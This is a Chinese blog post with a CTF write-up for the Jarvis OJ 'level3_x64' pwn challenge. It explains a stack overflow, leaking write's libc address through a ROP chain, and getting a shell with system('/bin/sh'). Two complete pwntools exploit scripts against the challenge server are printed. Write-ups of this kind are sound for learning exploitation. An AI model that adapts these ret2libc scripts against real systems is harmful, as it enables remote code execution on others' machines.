Jarvis OJ - pwn level3-64

最新推荐文章于 2021-09-18 23:37:58 发布
最新推荐文章于 2021-09-18 23:37:58 发布
阅读量261 收藏 1
点赞数
分类专栏: Jarvis OJ CTF解题
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hanqdi_/article/details/104248544
版权

pwn - level3_x64

  1. 检查保护机制
    在这里插入图片描述
    只开启了NX保护,堆栈不可执行保护。

  2. 放入ida分析,发现read栈溢出。
    在这里插入图片描述
    在这里插入图片描述

  3. 思路:没有system和binsh的情况下,在read函数前有write函数运行,可以通过泄漏write函数的地址来泄漏libc版本,从而泄漏system和binsh地址。

  4. 泄漏write函数,需要调用write(1,write_got,0x08)

  5. 需要找出rdi,rsi,rdx的地址。没有rdx的地址。
    在这里插入图片描述
    在这里插入图片描述
    我们部署的payload是通过调用read函数的栈溢出进行利用的,首先进入主函数,执行vul函数,再输出input那句话,再执行read函数,这里的rdx是read函数的值0x200,即大于在栈中调用的write函数中的0x08,只要大于8个就可以,因为,我们只读取读入数据的前八个字节。所以,rdx里的值不需要修改。
    在这里插入图片描述

  6. 脚本

from pwn import *
from LibcSearcher import LibcSearcher
r = remote("pwn2.jarvisoj.com ","9883")
write_plt = 0x00000000004004B0
write_got = 0x0000000000600A58
read_plt = 0x00000000004004C0
vul_addr = 0x00000000004005E6


pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1

payload = 'a'*0x80+'b'*0x8
payload += p64(pop_rdi)+p64(0x01)
payload += p64(pop_rsi_r15)+p64(write_got)+p64(0)
payload += p64(write_plt)+p64(vul_addr)

r.recvuntil("Input:\n")
r.sendline(payload)
write_addr = u64(r.recv(8))
print hex(write_addr)

libc = LibcSearcher('write',write_addr)

write_libc = libc.dump('write')
system_libc = libc.dump('system')
binsh_libc = libc.dump('/bin/sh')

libc_base = write_addr - write_libc
system_addr = libc_base + system_libc
binsh_addr = libc_base + binsh_libc

payload = 'a'*0x80+'b'*0x08
payload += p64(pop_rdi)+p64(binsh_addr)
payload += p64(system_addr)+p64(vul_addr)

r.recvuntil("Input:\n")
r.sendline(payload)
r.interactive()

最近Jarvis oj上的level部分的题目连接不上,无法测试自己写的脚本是否正确,等修复后再提交看看。

更新:
私聊了搭建该oj的博主,他说可以连接上,我本以为是题目问题(因为之前有两道题目确实是连接不上,博主修复后才可以),但是别人都能连接上,说明是脚本问题。
于是,又来看脚本,发现!!
仅仅是在com后边多了一个空格,就出了大错!以后就记住了。

r =remote('pwn2.jarvisoj.com ',9883)

下边附上新的解题脚本,上述脚本运行不出,在搜索libc版本时,没有找到相应版本。题目给出了libc文件。

from pwn import *

#context.log_level = "debug"
r =remote('pwn2.jarvisoj.com',9883)
e = ELF("./level3_x64")

write_plt = 0x00000000004004B0
write_got = 0x0000000000600A58
vul_addr = 0x00000000004005E6


pop_rdi = 0x00000000004006b3
pop_rsi_r15 = 0x00000000004006b1

payload = 'a'*0x80+'b'*0x8
payload += p64(pop_rdi)+p64(0x01)
payload += p64(pop_rsi_r15)+p64(write_got)+p64(0)
payload += p64(write_plt)+p64(vul_addr)

r.recvuntil("Input:\n")
r.sendline(payload)
write_addr = u64(r.recv(8))
print hex(write_addr)

libc=ELF("libc-2.19.so") 
offset=write_addr-libc.symbols["write"] 
sys_addr=offset+libc.symbols["system"] 
bin_addr=offset+libc.search("/bin/sh").next()
payload2='a'*0x88+p64(pop_rdi)+p64(bin_addr)+p64(sys_addr)+"ret-addr"

r.recvuntil("Input:\n")
r.sendline(payload2)
r.interactive()

在得到write_got的地址等,可以用以下脚本,以防地址找错。

elf=ELF("level3_x64") 
write_plt=elf.symbols["write"] 
write_got=elf.got["write"] 
vul_addr=elf.symbols['vulnerable_function']
123111234
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
专栏目录
(Jarvis Oj)(Pwn) level3_x64
Nothing
04-24 948
(Jarvis Oj)(Pwn) level3_x64 这题是level3的64位版本,思路和32位版本一致,不同之处就是函数的参数传递,利用寄存器,于是构造rop链。写得脚本如下: from pwn import * ...
jarvisoj_level3_x64
m0sway的博客
11-26 590
jarvisoj_level3_x64 使用checksec查看: 只开启了栈不可执行,应该是jarvisoj_level3的x64版本,直接放进IDA中看吧: 主函数中直接给出了漏洞函数,跟进查看: read()函数,存在栈溢出,和jarvisoj_level3的主要区别在栈上传参和寄存器传参。 exp: from pwn import * #start # r = process("../buu/jarvisoj_level3_x64") r = remote("node4.buuoj.cn",
Jarvis OJlevel3_x64_通用ROP
Jc
07-13 310
解题思路 1. 查看文件信息,安全机制 2. 代码审计 3. 分析漏洞点 4. 编写EXP 1.基本信息 安全机制 2.代码审计 3.漏洞分析 1.程序无system和bin/sh,并且是个64位的,我们不能进行往栈里面写入数据 2.64位汇编 当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9。 当参数为7个以上时, 前 6 个与前面一样,...
[Jarvis OJ - PWN]——[XMAN]level3_x64
Y_peak的博客
02-08 277
[Jarvis OJ - PWN]——[XMAN]level3_x64 题目地址:https://www.jarvisoj.com/challenges 题目: 老样子,还是先checksec一下,再看看IDA,除了64位以外和[XMAN]level3一样 64位和32位的主要区别就是参数方面,64位当参数小于等于六的时候,是放在寄存器中,没有放在栈上。分别是rdi rsi rdx rcx r8 r9寄存器。所以我们需要找一些pop指令来将参数写入寄存器。 虽然没有找到pop rdx指令,但
[BUUCTF-pwn]——jarvisoj_level3_x64
Y_peak的博客
02-22 222
[BUUCTF-pwn]——jarvisoj_level3_x64 题目地址:https://buuoj.cn/challenges#jarvisoj_level3_x64 点击查看 write up 博主有点懒,不想写第二遍。 ????
jarvisoj_typo
05-14
jarvisoj_typo,arm架构下的pwn题。
JarvisOJ.docx
03-10
JarvisOJ Web 知识点总结 本文总结了 JarvisOJ Web 中的多个知识点,涵盖了网络安全、Web 开发、加密算法、SQL 注入、XML 实体注入、robots.txt、Cookie hijacking 等领域。 一、Port 51 端口访问 在 JarvisOJ ...
JarvisAlgorithm:Jarvis算法-Java
03-06
Jarvis算法,又称礼品包装算法,是计算几何领域中用于寻找给定点集的凸包的经典算法。这个算法由Marvin Jarvis于1973年提出,主要用于处理二维空间中的点集问题。在Java编程语言中,我们可以实现这个算法来创建一个...
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
02-05
jarvisJARVIS-Tools:用于数据驱动的原子材料设计的开源软件包
Jarvis-Musical-Bot:Jarvis Telegram Music Bot for Spotify
04-06
Jarvis Telegram Music Bot for Spotify 该Telegram机器人允许用户授权其Spotify帐户并获得不错的功能。 授权实际上不收集用户昵称以外的任何私人数据。 其特点: 分享当前歌曲。 您可以共享Spotify客户端上当前...
[BUUCTF]PWN——jarvisoj_level3_x64
BangSen1的博客
03-17 236
jarvisoj_level3_x64 例行检查,64位,开启NX保护。 运行一下。 IDA打开,查看main函数 function()函数 buf溢出漏洞,read之前已经调用过write函数,利用它来泄露libc版本 64位程序在传参的时候要先用到rdi,rsi,rdx,rcx,r8,r9这几个寄存器,都满了之后才会在栈上传参 利用ROPgadget找一下设置寄存器的指令 rdi=0x4006b3 rsi_r15=0x4006b1 payload='a'*(0x80+8)+p64(rdi)+
18.9.20 Jarvis OJ PWN----[XMAN]level3(x64)
qq_42192672的博客
09-20 452
解压之后有两个文件,其中一个是lib,checksec后发现没有栈保护,wo,好想知道该怎么做了 拖进IDA看一下哪里可以溢出 read函数可以溢出 然后根据偏移量把system函数和/bin/sh在内存的位置提取出来 同样采取rop代码,注意64位的传参数顺序哦 上脚本 #代码主体 write_got=bin.got['write'] write_plt=bin.plt['w...
JarvisOJ level3_x64
PLpa的博客
07-09 1000
这题和level3大同小异,只不过这一题是x64的程序 做这题之前,建议先写level2。 拿到这题,我们首先查看保护: 程序只开了NX保护,好的。 根据做过level3的经验,我们先找出我们需要的地址(也可以用pwntools工具自动找): vul()函数: write()函数的plt地址: 之后我们找齐需要用的gadget: 但是我们并没有找到pop rdx ; ret,根据我们对w...
【BUUCTF】jarvisoj_level3_x64,picoctf_2018_rop chain
m0_51251108的博客
12-30 192
【BUUCTF】jarvisoj_level3_x64 ROPgadget缺了rdx,对应的是输出的长度,要大于8 gdb调试可以看到rdx的值是0x200,足够大,不用管了 from pwn import* r=remote('node3.buuoj.cn',29628) libc=ELF('./libc-2.23.so') elf=ELF('./level3_x64') context.log_level = 'debug' context.arch = elf.arch pop_rdi=0x4006
JarvisOj pwn level3_x64
qq_44813849的博客
07-27 519
JarvisOj pwn level3_x64 这一道题和level3那道题很像,同样是一个压缩包里面有两个文件。 使用ROPgadget搜索操作寄存器的函数地址: 用ida打开level3_x64文件,找到主函数的地址 plt表和got表中的write地址 附上脚本 from pwn import * elf=ELF("level3_x64") write_plt=0x000000000...
pwn3_x64
m0_49959202的博客
09-18 210
文章目录pwn3_x641.程序分析2.栈帧设计3.exp编写 pwn3_x64 1.程序分析 file一下,发现是64位程序: checksec一下,发现pie没开: ldd一下,找到需要的动态链接库: ida分析: 思路和上一题32位的一样,没啥好分析的 64位与32的不同在于传参:当参数少于7个时, 参数从左到右放入寄存器: rdi, rsi, rdx, rcx, r8, r9 因此需要ROP链找到rdi, rsi, rdx。 用ROPgadget查看下: 发现有现成的pop rdi; ret
夏令营第二周pwnlevel-x64题总结
MIGENGKING的博客
07-26 345
今天我来总结一下pwnlevel2_x64: 我们直接把题目放进ubuntu虚拟机查看题目: 发现题目的arch模块是64位的;NX保护模式开启,所无法构建shellcode拿到shell/ 接下把文件放进IDAx64分析: ...
[pwn] 6.ROP练习
H4ppyD0g的博客
09-01 281
文章目录pwn0pwn1pwn2pwn2_x64pwn3pwn3_x64 pwn0 经典ret2text,不过是64位程序,覆盖ebp需要8个字节。 from pwn import * elf = ELF('./level0') callsys_addr = elf.symbols['callsystem'] io = process('./level0') io.recvuntil(b'World\n') payload = cyclic(0x80 + 0x8) + p64(0x0000000000
jarvis oj level3_x64
发蝴蝶和大脑斧的博客
12-07 803
level3_x64里没有找到system函数,但给了libc.so文件,应该是和level3一样的想法。 先找到操作寄存器的地址,因为write需要3个参数,所以需要rdi,rsi,rdx。但我们搜索只找到了rdi和rsi。 0x00000000004006b3 : pop rdi ; ret 0x00000000004006b1 : pop rsi ; pop r15 ; ret 根据网上w...
jarvisoj_level0
最新发布
08-14
引用是一段关于利用pwntools库对jarvisoj_level0进行攻击的代码。代码中使用了remote()方法建立了远程连接,并构造了一个payload来利用栈溢出漏洞,最终执行callsystem()函数来获取shell权限。引用也是类似的代码,...
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值